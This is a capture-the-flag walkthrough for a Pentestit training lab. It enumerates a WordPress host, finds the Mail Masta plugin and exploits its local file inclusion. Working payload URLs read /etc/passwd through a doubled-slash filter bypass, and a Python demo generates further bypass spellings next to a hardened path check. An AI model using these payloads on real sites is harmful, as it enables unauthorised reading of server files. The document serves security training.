Pentestit.ru - TEST LAB 14 - Site Token

Let’s start this awesome adventure!

You can start there > TEST LAB 14

We have two entry point addresses:

1. 192.168.101.14
2. 192.168.101.15

Let’s enumerate 192.168.101.14 first.

As always, let's start with an nmap scan.

$ ip=192.168.101.14
$ nmap -sC -sV -oN nmap.txt $ip
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-30 15:00 EEST
Nmap scan report for site.test.lab (192.168.101.14)
Host is up (0.14s latency).
Not shown: 997 filtered ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    nginx 1.16.1
|_http-server-header: nginx/1.16.1
|_http-title: 403 Forbidden
143/tcp  open  imap    Dovecot imapd
|_imap-capabilities: have AUTH=PLAIN more IDLE post-login listed LITERAL+ LOGIN-REFERRALS ID Pre-login SASL-IR capabilities ENABLE OK AUTH=LOGINA0001 IMAP4rev1
8080/tcp open  http    nginx
|_http-open-proxy: Proxy might be redirecting requests
| http-title: Roundcube Webmail :: Welcome to Roundcube Webmail
|_Requested resource was http://site.test.lab:8080/mail/

Let's start with port 80. Nmap reverse-resolved the host as site.test.lab, but when we open that name in the browser we get this error:

Hmm. We’re having trouble finding that site.

We can’t connect to the server at site.test.lab.

Why is this happening?

Because of web server virtual hosts.

virtual hosts -> allow one machine to serve more than one website from the same IP address and port.

When we browse to a machine by domain name, for example test.vulnhub, the browser puts that name in the HTTP Host header and the web server picks which site to serve from it. If we browse to the raw IP address instead, the Host header carries the IP, which matches none of the configured names, so the server answers with its default site or an error page; that is the 403 Forbidden nmap saw on port 80. And our browser cannot resolve site.test.lab to an address at all, which is the error above, so we have to supply the name-to-IP mapping ourselves.

We need to add this hostname to /etc/hosts.

/etc/hosts -> translates hostnames to IP addresses, and is consulted before DNS.

For Windows users the file is at C:\Windows\System32\drivers\etc\hosts.

Using the hosts file also means we can type the hostname instead of remembering the IP address.

Let’s add it.

# nano /etc/hosts
...
192.168.101.14  site.test.lab
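How the Host header selects the site, as an added example that is not part of the original walkthrough: a small Python stand-in for the lab's nginx (one named vhost plus a default server that answers 403 for any other Host, mirroring what nmap saw on port 80; the vhost name and the WordPress body are assumptions) and a client that connects to the raw IP but pins the Host header, which is exactly what `curl -H 'Host: site.test.lab' http://192.168.101.14/` does and what the /etc/hosts entry achieves transparently for the browser. The `probe` function generalises this into a basic vhost enumeration: try several names against one IP and report those that answer differently from the default server.

```python
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed stand-in for the lab's nginx config: one named virtual host and
# a default server that refuses every Host it does not recognise.
VHOSTS = {
    "site.test.lab": (200, b'<meta name="generator" content="WordPress 5.0" />'),
}
DEFAULT = (403, b"<h1>403 Forbidden</h1>")


class VHostHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # nginx matches server_name against the Host header (port stripped).
        host = self.headers.get("Host", "").split(":")[0].lower()
        status, body = VHOSTS.get(host, DEFAULT)
        self.send_response(status)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the demo quiet
        pass


def start_server():
    """Bind the fake web server on an ephemeral localhost port and serve in the background."""
    srv = HTTPServer(("127.0.0.1", 0), VHostHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def fetch(ip, port, host_header):
    """Connect to the raw IP but send an explicit Host header.
    Passing Host in the headers dict makes http.client use it verbatim."""
    conn = http.client.HTTPConnection(ip, port, timeout=5)
    conn.request("GET", "/", headers={"Host": host_header})
    resp = conn.getresponse()
    body = resp.read().decode()
    conn.close()
    return resp.status, body


def probe(ip, port, candidates):
    """Simple vhost enumeration: names whose response differs from the
    default server's answer (Host set to the bare IP) are real sites."""
    baseline = fetch(ip, port, ip)
    return {name: fetch(ip, port, name)[0]
            for name in candidates
            if fetch(ip, port, name) != baseline}


if __name__ == "__main__":
    srv = start_server()
    ip, port = srv.server_address
    print("Host = raw IP      :", fetch(ip, port, ip))              # 403, like browsing by IP
    print("Host = site.test.lab:", fetch(ip, port, "site.test.lab"))  # 200, the WordPress page
    print("probe:", probe(ip, port, ["mail.test.lab", "site.test.lab", "dev.test.lab"]))
    srv.shutdown()
```

The same idea works against the real target without touching /etc/hosts: `curl -s -o /dev/null -w '%{http_code}\n' -H 'Host: site.test.lab' http://192.168.101.14/` should return 200 where a plain request to the IP returns 403.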

Now we can see a WordPress site!

<meta name="generator" content="WordPress 5.0" />

Let's run wpscan to enumerate plugins.

$ wpscan --no-banner --url http://site.test.lab/ --enumerate p --random-user-agent
..junk data..
[i] Plugin(s) Identified:

[+] mail-masta
 | Location: http://site.test.lab/wp-content/plugins/mail-masta/
 | Latest Version: 1.0 (up to date)
 | Last Updated: 2014-09-19T07:52:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 1.0 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://site.test.lab/wp-content/plugins/mail-masta/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://site.test.lab/wp-content/plugins/mail-masta/readme.txt

Let’s search for possible exploits.

$ searchsploit mail masta
WordPress Plugin Mail Masta 1.0 - Local File Inclusion | php/webapps/40290.txt

Let's test it out. The vulnerable script includes whatever file is named in the pl parameter:

http://site.test.lab/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd

That returns an error message, so something in front of the include rejects the literal path. A doubled slash gets past it: //etc//passwd does not match the string /etc/passwd, but the filesystem collapses repeated slashes, so PHP still includes the same file.

So the check looks like a naive string match on the requested path, most likely in the developer's own code.

http://site.test.lab/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=//etc//passwd
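Why the doubled slash works, and what a check that cannot be bypassed this way looks like, as an added example that is not the Mail Masta plugin's code (the page does not show the filter, so the substring blacklist below is an assumed stand-in for the behaviour observed, and the plugin directory path is an assumption too). The vulnerable check compares the raw string; the hardened check canonicalises the path first and then requires it to stay under the plugin directory, so slash tricks make no difference.

```python
import os
import re

# Assumed stand-in for the rejecting check: a plain substring blacklist.
BLACKLIST = ("/etc/passwd", "/etc/shadow", "../")

# Assumed plugin directory; count_of_send.php sits in inc/campaign/ per the URL above.
CAMPAIGN_DIR = "/var/www/html/wp-content/plugins/mail-masta/inc/campaign"


def naive_filter_allows(pl):
    """Vulnerable check: looks at the spelling of the string, not the file it names."""
    return not any(bad in pl for bad in BLACKLIST)


def kernel_path(pl):
    """What open()/include actually resolve: repeated slashes and /./ collapse."""
    return os.path.normpath(re.sub(r"/+", "/", pl))


def bypass_variants(path):
    """Spellings of the same file that a substring blacklist does not match."""
    return [
        path.replace("/", "//"),   # the trick used on the page: //etc//passwd
        path.replace("/", "/./"),  # /./etc/./passwd, also collapsed by the kernel
    ]


def safe_include_path(pl, base=CAMPAIGN_DIR):
    """Hardened check: canonicalise first, then compare.
    realpath() resolves //, /./, .. and symlinks, so the comparison
    sees the file that would really be opened."""
    base = os.path.realpath(base)
    target = os.path.realpath(os.path.join(base, pl))
    if os.path.commonpath([base, target]) != base:
        raise ValueError(f"refusing path outside {base}: {pl!r} -> {target}")
    return target


def is_rejected(pl, base=CAMPAIGN_DIR):
    """True if the hardened check refuses this pl value."""
    try:
        safe_include_path(pl, base)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    for candidate in ["/etc/passwd"] + bypass_variants("/etc/passwd"):
        print(f"{candidate:18} blacklist allows={naive_filter_allows(candidate)!s:5} "
              f"really opens={kernel_path(candidate)}")
    for candidate in ["template.php", "//etc//passwd", "../../../../wp-config.php"]:
        print(("blocked: " if is_rejected(candidate) else "allowed: ") + candidate)
```

Note that the absolute-path bypass is only part of the problem: even with a perfect blacklist, `pl` should never reach `include` at all; an allowlist of the exact template names the script needs is the real fix.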

At the end of the included file we can see token_hrTY9s4Cv, we got it!

Site Token -> hrTY9s4Cv

See you, in the next step!